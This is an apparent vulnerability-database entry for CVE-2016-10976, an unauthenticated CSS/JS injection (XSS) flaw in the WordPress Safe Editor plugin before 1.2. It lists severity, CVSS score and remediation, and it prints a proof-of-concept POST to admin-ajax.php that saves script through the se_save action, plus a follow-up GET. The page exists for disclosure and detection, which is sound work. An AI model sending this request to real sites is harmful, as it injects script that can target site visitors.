🔙 목록으로 돌아가기

CVE-2016-10976: Safe Editor Plugin < 1.2 - CSS/JS-injection

TitleSafe Editor Plugin < 1.2 - CSS/JS-injection
AuthorSplint3r7
SeverityMedium
ImpactUnauthenticated attackers can inject malicious JavaScript or CSS code into the site, potentially stealing credentials, manipulating site content, or targeting site visitors.
RemediationUpdate to the latest version of safe-editor plugin or apply the patch provided by the vendor.
CVSS Score6.1
EPSS Score0.00656
CVE IDCVE-2016-10976
CWE IDCWE-79
Tags cve cve2016 wordpress wp wp-plugin xss safe_editor vuln

🔍 Vulnerability Description

The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Content-Length: 50
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

action=se_save&type=js&data=alert(document.domain)
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10.15, rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10976.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10976.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A